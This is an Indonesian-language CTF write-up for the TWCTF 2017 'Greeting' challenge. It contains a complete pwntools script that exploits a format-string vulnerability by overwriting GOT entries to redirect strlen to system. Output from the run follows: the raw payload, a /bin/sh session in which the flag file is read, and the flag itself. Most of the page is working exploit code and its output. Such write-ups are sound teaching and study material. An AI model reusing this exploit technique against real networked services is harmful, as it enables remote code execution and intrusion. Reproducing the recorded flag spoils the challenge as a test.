Powered by GitBook

TWCTF 2017 Greeting (150)

Masalah

Diberikan berkas greeting yang dijalankan sebagai layanan jaringan.

Penyelesaian

Penyelesaian dapat dilakukan dengan script ini.

import sys
from libformatstr import FormatStr
from pwn import *

pr=0x8049934
nao=0x8048742
main=0x80485ed
strlen=0x8049a54

local=len(sys.argv)==1
if not local:
    s=remote('pwn2.chal.ctf.westerns.tokyo',16317)
else:
    s=remote('127.0.0.1',5000)
print s.recvline()
print s.recv(30)

p1=FormatStr()
p1[pr]=main
system=0x08048496
p1[strlen]=system
offset=12
padding=2
round1=p1.payload(offset,padding,18)
print round1
s.sendline(round1)
log.info("round1 sent!")
s.recvline(timeout=10)
s.sendline("/bin/sh")
s.interactive()
s.close()

Proses eksploitasi.

[+] Opening connection to pwn2.chal.ctf.westerns.tokyo on port 16317: Done
Hello, I'm nao!

Please tell me your name... 
%2034c%22$hn%23$hn%31890c%24$hn%343c%25$hn6\x99\x0V\x9a\x0T\x9a\x04\x99\x0
[*] round1 sent!
[*] Switching to interactive mode
Please tell me your name...
$ ls
flag
greeting
launch.sh
$ cat flag
TWCTF{51mpl3_FSB_r3wr173_4nyw4r3}
[*] Interrupted
[*] Closed connection to pwn2.chal.ctf.westerns.tokyo port 16317

Summary

Tools

libformatstr
pwntools

Vulnerability

Format string vulnerability

results matching ""

No results matching ""